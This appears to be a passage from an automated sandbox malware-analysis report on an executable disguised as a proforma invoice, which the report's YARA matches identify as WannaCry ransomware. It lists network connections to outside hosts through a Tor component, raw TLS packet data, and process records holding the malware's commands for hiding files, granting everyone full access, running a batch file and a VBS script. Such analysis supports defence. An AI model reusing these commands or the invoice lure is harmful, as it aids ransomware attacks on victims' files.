                                                          Jan 16, 2024 11:59:49.203480005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203489065 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203654051 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203661919 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203779936 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.203779936 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.203824043 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203833103 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.203999996 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.204009056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.204130888 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.204130888 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.204160929 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.204169035 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.204329014 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.205507994 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.206810951 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.206985950 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.206988096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.206996918 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207009077 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207196951 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207204103 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207210064 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207283974 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.207283974 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.207334995 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207341909 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207349062 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207508087 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207515955 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207561016 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.207700968 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.207700968 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207710028 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207715988 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207874060 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.207880020 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207890987 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.207897902 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208051920 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.208053112 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208061934 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208180904 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.208220005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208226919 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208234072 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208285093 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.208285093 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.208401918 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.208885908 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.209414959 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209424019 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209575891 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209583044 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209630966 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.209769964 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209778070 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209783077 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.209784985 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209954023 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.209963083 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210011959 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.210133076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210140944 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210196018 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.210196018 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.210196018 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.210319042 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210326910 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210484982 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210491896 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.210712910 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.211052895 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.211858034 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.217688084 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.219731092 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.260891914 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.333950043 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.400773048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.441852093 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:50.761688948 CET49731443192.168.2.16167.114.66.61
                                                          Jan 16, 2024 11:59:50.761764050 CET44349731167.114.66.61192.168.2.16
                                                          Jan 16, 2024 11:59:50.761852980 CET49731443192.168.2.16167.114.66.61
                                                          Jan 16, 2024 11:59:50.762094975 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:50.762278080 CET49731443192.168.2.16167.114.66.61
                                                          Jan 16, 2024 11:59:50.762314081 CET44349731167.114.66.61192.168.2.16
                                                          Jan 16, 2024 11:59:50.957938910 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:50.957953930 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:50.957961082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:50.957979918 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:50.958410978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:51.152489901 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.152546883 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.152559042 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.152570009 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.152581930 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.152627945 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:51.152686119 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:51.346630096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.394161940 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:51.588071108 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:51.632258892 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:53.397974968 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:53.398070097 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 11:59:53.398181915 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:53.399538040 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:53.399554968 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 11:59:54.138973951 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 11:59:54.139062881 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:54.145601034 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:54.145610094 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 11:59:54.146013975 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 11:59:54.146333933 CET49732443192.168.2.1677.73.69.128
                                                          Jan 16, 2024 11:59:54.189914942 CET4434973277.73.69.128192.168.2.16
                                                          Jan 16, 2024 12:00:55.718967915 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 12:00:55.773542881 CET4972980192.168.2.16171.25.193.9

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.1649729171.25.193.9801220C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2024 11:59:46.967421055 CET213OUTData Raw: 16 03 01 00 d0 01 00 00 cc 03 03 f4 49 28 f6 eb 30 c4 ab db 32 6d 82 c9 4c 11 33 44 ba 7b 53 c9 9a fc 6e c7 17 9c d8 ab 40 22 d3 00 00 30 c0 2b c0 2f c0 0a c0 09 c0 13 c0 14 c0 12 c0 07 c0 11 00 33 00 32 00 45 00 39 00 38 00 88 00 16 00 2f 00 41
                                                          Data Ascii: I(02mL3D{Sn@"0+/32E98/A5swww.rcc2s6euhahhm.com#
                                                          Jan 16, 2024 11:59:47.162846088 CET1014INData Raw: 16 03 03 00 39 02 00 00 35 03 03 1b cd 90 64 34 af b6 f5 56 70 39 3e 3a a1 c8 9f 48 f0 ac 8a 43 44 2a ce 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 58 0b 00 02 54 00 02 51 00 02 4e 30 82 02 4a 30
                                                          Data Ascii: 95d4Vp9>:HCD*DOWNGRD/XTQN0J0Cw0*H0'1%0#Uwww.f4h5cevxhhrgl5dilq4v.com0231226000000Z240130000000Z0$1"0 Uwww.7fcmkfnstyj5y7yma.net0"0*H
                                                          Jan 16, 2024 11:59:47.166140079 CET126OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 2d 49 91 88 7c 4c f7 36 ff d7 9a 82 c7 7e ee 10 eb 6c ec b0 d6 63 e7 ca e8 fd 31 a7 85 ff 4e 2d ed a5 e4 cc 19 cc 05 b0 16 7a 04 55 34 39 6d ad a0 8d 76 1f 2e b1 5d 44 65 82 19 fb 07 f4 c4 74 14 03 03 00 01 01 16
                                                          Data Ascii: FBA-I|L6~lc1N-zU49mv.]Det(=;_{d{vG%<>^Bu~
                                                          Jan 16, 2024 11:59:47.360215902 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 06 ec 73 a7 29 dc 57 d3 da a7 30 93 b8 e5 e0 b1 96 cf c4 99 82 71 27 b6 fd 41 60 44 ff f5 40 09 80 a1 8a 38 28 e6 eb 73
                                                          Data Ascii: (s)W0q'A`D@8(s
                                                          Jan 16, 2024 11:59:47.361183882 CET38OUTData Raw: 17 03 03 00 21 a1 ec b1 3d 3b c8 05 1f 0c cf 87 bb 43 7c 0e 89 0b 9a 8e da f2 da 43 e3 6e 93 d5 48 3c 4f e5 f0 87
                                                          Data Ascii: !=;C|CnH<O
                                                          Jan 16, 2024 11:59:47.555062056 CET1286INData Raw: 17 03 03 08 1e 06 ec 73 a7 29 dc 57 d4 64 a1 23 2b cd f2 e4 10 7e aa 24 7d 3a b9 17 9a 55 06 06 a4 49 fb 60 e4 04 c1 58 45 17 93 89 51 35 a9 f5 5b 61 0c 64 bd 3e b2 7f f5 8c 69 e3 91 18 37 a6 a0 c6 70 d1 2f cb 53 57 43 83 68 2a f9 ac b0 3e 18 e7
                                                          Data Ascii: s)Wd#+~$}:UI`XEQ5[ad>i7p/SWCh*>8xDe Ob(C__fzJ+]~: q/ejBI|7N*dt60)SHNs7@+l1?-.]q6@"+2u{:{}YJ(l]}:rUu
                                                          Jan 16, 2024 11:59:47.555075884 CET797INData Raw: 80 1c 81 53 b0 4a b6 84 3c d5 84 f3 ec 3f 63 b9 bd 18 1c 7a f6 3a e0 05 28 35 30 2e b8 b4 eb b8 bc 20 20 97 ba 2b 3c 85 3c 66 95 48 08 7b 14 69 3d c9 3a 02 fe a5 dd 15 d4 f1 bf f1 b6 59 4f 51 fd a0 60 f4 7c 02 bd f7 2c 56 3a 17 21 40 82 9d 43 0e
                                                          Data Ascii: SJ<?cz:(50. +<<fH{i=:YOQ`|,V:!@CLHhGWgf?CtU#XS)9MB8E#;twC7?sy:'F-+nJXp2}}TX&\?gLOyFjuGi47}<5=
                                                          Jan 16, 2024 11:59:47.640111923 CET1057OUTData Raw: 17 03 03 04 1c a1 ec b1 3d 3b c8 05 20 e4 10 7e 8f ca 55 aa 9f 12 77 31 15 b3 46 a5 2c a2 54 22 27 07 29 8b 52 11 41 87 54 04 3a 37 1b 62 24 b2 8b bb 51 11 6e e4 10 3b 2b 23 2e 49 f9 8f c3 e2 ce 22 b0 80 55 4c 68 de 6e 33 25 58 b2 9d 01 cc 60 6b
                                                          Data Ascii: =; ~Uw1F,T"')RAT:7b$Qn;+#.I"ULhn3%X`k*YXv)%Sv!T}T\6UOcM)u]0%kB </;P';[0[|g,RV&Y$t|5R1gk?"l#!7'NAe&
                                                          Jan 16, 2024 11:59:47.836647987 CET543INData Raw: 17 03 03 02 1a 06 ec 73 a7 29 dc 57 d5 1b 10 17 7e 0b 21 e9 92 37 0e 7d e4 ea 0a 79 07 8d b9 e2 77 6f 86 95 2f d9 74 b8 38 66 8f d2 17 bb 27 14 dc 79 8c 10 e8 32 63 b4 73 20 de d0 5f 40 b3 1e 2d 03 02 21 d0 f0 c4 8f ea 70 20 b7 24 27 d1 1f 00 3a
                                                          Data Ascii: s)W~!7}ywo/t8f'y2cs _@-!p $':vw5gx\2Tj6!R\O:6 }J"C:,0)FSA=KcUHEWd>lw=3LyGJRqq>\~D["j]np\|V6&srq{y
                                                          Jan 16, 2024 11:59:47.840543032 CET1057OUTData Raw: 17 03 03 04 1c a1 ec b1 3d 3b c8 05 21 80 47 46 22 49 14 87 03 2b 83 24 6d 09 46 01 57 e3 a9 48 79 1c 6e 3c 75 8c c9 65 29 cc 88 54 51 55 99 60 aa 6f bc 3e 02 f5 b0 99 f5 df 70 3f 7d 1f a3 29 c5 38 f2 24 de bd 62 0c 8e 54 2f 77 5e cd f0 8c 91 67
                                                          Data Ascii: =;!GF"I+$mFWHyn<ue)TQU`o>p?})8$bT/w^g?%"U=W~|gVxEycQk:<sjIn{gA&-o/SGraCxHt{4;ed@F-sDa*y@7Pl+MRJ`zEa8hT3>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:11:58:33
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          Imagebase:0x7ff697020000
                                                          File size:71'680 bytes
                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:11:58:50
                                                          Start date:16/01/2024
                                                          Path:C:\Program Files\7-Zip\7zG.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780
                                                          Imagebase:0x270000
                                                          File size:700'416 bytes
                                                          MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:11:59:02
                                                          Start date:16/01/2024
                                                          Path:C:\Program Files\7-Zip\7zG.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652
                                                          Imagebase:0x270000
                                                          File size:700'416 bytes
                                                          MD5 hash:50F289DF0C19484E970849AAC4E6F977
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:11:59:25
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe"
                                                          Imagebase:0x400000
                                                          File size:3'514'368 bytes
                                                          MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Joe Security
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Florian Roth (with the help of binar.ly)
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: ReversingLabs
                                                          Antivirus matches:
                                                          • Detection: 92%, ReversingLabs
                                                          • Detection: 94%, Virustotal, Browse
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:11
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\attrib.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:attrib +h .
                                                          Imagebase:0xac0000
                                                          File size:19'456 bytes
                                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:icacls . /grant Everyone:F /T /C /Q
                                                          Imagebase:0x740000
                                                          File size:29'696 bytes
                                                          MD5 hash:2E49585E4E08565F52090B144062F97E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:11:59:26
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 89%, ReversingLabs
                                                          • Detection: 88%, Virustotal, Browse
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c 118491705402797.bat
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cscript.exe //nologo m.vbs
                                                          Imagebase:0x50000
                                                          File size:144'896 bytes
                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:11:59:27
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:11:59:28
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:11:59:29
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:11:59:30
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:11:59:30
